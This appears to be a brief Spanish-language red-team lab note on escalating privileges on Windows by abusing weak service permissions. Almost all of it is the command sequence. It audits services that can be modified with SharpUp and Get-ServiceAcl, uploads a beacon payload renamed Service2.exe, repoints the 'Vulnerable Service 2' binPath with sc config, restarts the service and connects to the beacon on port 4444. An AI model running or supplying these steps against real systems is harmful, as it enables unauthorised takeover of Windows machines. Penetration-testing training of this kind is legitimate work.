Weak Service Permissions
Identificar servicios vulnerables.
execute-assembly C:\Tools\SharpUp.exe audit ModifiableServicesMuestra los permisos de los servicios que podemos modificar.
powershell-import c:\Tools\Get-ServiceACL.ps1
powershell Get-ServiceAcl -Name "Vulnerable Service 2" | select -expandproperty AccessCreamos un payload y lo subimos a la maquina victima.
mkdir c:\Temp
cd c:\Temp
upload C:\Tools\Payloads\tcp_beacon_x64.exe
mv tcp_beacon_x64.exe Service2.exeConfiguracion del servicio.
run sc config "Vulnerable Service 2" binPath= C:\Temp\Service2.exeVerificar las caracteristicas del servicio.
run sc qc "Vulnerable Service 2"Iniciar servicio.
run sc stop "Vulnerable Service 2"
run sc start "Vulnerable Service 2"Acceder al beacon.
connect localhost 4444